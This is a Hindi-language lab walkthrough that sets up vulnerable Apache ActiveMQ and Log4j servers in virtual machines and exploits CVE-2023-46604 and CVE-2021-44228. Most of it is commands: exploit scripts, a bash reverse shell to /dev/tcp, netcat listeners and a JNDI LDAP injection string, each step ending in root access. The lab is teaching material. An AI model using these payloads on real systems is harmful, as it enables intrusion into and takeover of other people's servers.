
CVE-2021-44228 और CVE-2023-46604 कमजोरियों के शोषण के निर्देश
यह लैब CVE-2023-46604 की कमजोरियों का शोषण करने के बारे में मार्गदर्शन करता है।
इस लैब में 2 वर्चुअल मशीनों की स्थापना आवश्यक है। एक Kali Linux मशीन संस्करण 2023.4 और एक Ubuntu मशीन संस्करण 22.04.3 LTS। आप उन्हें यहाँ से डाउनलोड कर सकते हैं:

Kali Linux मशीन पर:
git स्थापित करें
$sudo apt install git
gedit स्थापित करें
$sudo apt install gedit
Ubuntu मशीन पर:
git स्थापित करें
$sudo apt install git
openjdk 18 स्थापित करें
$sudo apt install openjdk-18-jdk
ActiveMQ 5.18.2 पैकेज स्थापित करें
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz
Ubuntu मशीन पर एक टर्मिनल विंडो खोलें और नीचे दिए गए कमांड को चलाएँ:
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start
सेवा की स्थिति जाँचें:
$./activemq status
यदि सेवा सफलतापूर्वक प्रारंभ होती है, तो टर्मिनल स्क्रीन पर "ActiveMQ Brocker is running" प्रदर्शित होगा।
आप http://127.0.0.1:8161 पर भी जाकर ActiveMQ ब्रोकर मैनेजर खोल सकते हैं। इसमें होस्टनाम, संस्करण, ID, अप टाइम और कुछ अन्य जानकारी शामिल है।
Kali Linux मशीन पर
शोषण प्रक्रिया के लिए संसाधन डाउनलोड करें:
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls
जैसा कि आप देख सकते हैं, हमारे पास 2 फ़ाइलें हैं: exploit.py और poc.xml:
$cd CVE-2023-46604
$python3 -m http.server
exploit.py फ़ाइल के माध्यम से लक्ष्य के सर्वर पर poc.xml फ़ाइल भेजने के लिए एक नया टर्मिनल विंडो खोलें:
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
कमांड निष्पादित होने के बाद, लक्ष्य मशीन पर कैलकुलेटर एप्लिकेशन लॉन्च होता है। यह साबित करता है कि कमजोरी का सफलतापूर्वक शोषण किया गया है। हम लक्ष्य मशीन को नियंत्रित करने के लिए एक रिवर्स शेल बनाना जारी रखते हैं।
रिवर्स शेल कनेक्शन सुनने के लिए एक नया टर्मिनल विंडो खोलें:
$sudo su
$nc -nlvp 4444
पिछले टर्मिनल पर वापस जाएँ और poc.xml फ़ाइल को संपादित करें:
$gedit poc.xml
मान gnome-calculator को bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 से बदलें और फ़ाइल को सहेजें।
दुर्भावनापूर्ण कोड फिर से भेज रहे हैं:
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml
इस कमांड का परिणाम यह है कि हमने लक्ष्य मशीन पर रूट शेल प्राप्त कर लिया है। ROOTED!!!
इस लैब में 2 वर्चुअल मशीनों की स्थापना आवश्यक है। Kali Linux मशीन संस्करण 2023.4 और Ubuntu मशीन संस्करण 22.04.3 LTS। आप उन्हें यहाँ से डाउनलोड कर सकते हैं:

Kali Linux मशीन पर:
git स्थापित करें
$sudo apt install git
gedit स्थापित करें
$sudo apt install gedit
Ubuntu मशीन पर:
git स्थापित करें
$sudo apt install git
docker स्थापित करें
$sudo apt install docker.io
Ubuntu मशीन पर
चरण 1: openjdk डाउनलोड करें
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz
चरण 2: docker फ़ाइल डाउनलोड और बनाएँ
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
$docker build -t cve44228
$docker run --network host cve44228
उपरोक्त कमांड पूरा करने के बाद, हमारे पास एक वेबसाइट है। वेब ब्राउज़ करने के लिए, आप URL: http://<ubuntu_ip>:8080 का उपयोग कर सकते हैं। इस ट्यूटोरियल में, पता कुछ इस प्रकार होगा: http://192.168.132.135:8080
Kali Linux मशीन पर, कमजोरी का शोषण करने के लिए आवश्यक संसाधन डाउनलोड करें
poc डाउनलोड करें
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt
openjdk डाउनलोड करें
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
//move the openjdk file to the directory containing the poc file
$mv jdk-8u20-linux-x64.tar.gz <path to the directory containing the poc file>
$tar -xf jdk-8u20-linux-x64.tar.gz //unzip the file
रिवर्स शेल कनेक्शन सुनने के लिए एक नया टर्मिनल खोलें:
$sudo su
$nc -nlvp 9001
poc फ़ाइल के साथ LDAP और HTTP सेवाएँ लॉन्च करें
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080
यह कमांड निम्नलिखित के समान परिणाम लौटाएगा
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up LDAP server
[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}
[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389
यहाँ, हम केवल उत्पन्न jndi मान में रुचि रखते हैं। एक वेब ब्राउज़र खोलें और पहले बनाई गई वेबसाइट का पता दर्ज करें। jndi मान का उपयोग करके लॉगिन करें। इस समय, netcat टर्मिनल एक कनेक्शन प्राप्त करता है। ROOTED!!!
सहायता के लिए, [email protected] पर ईमेल करें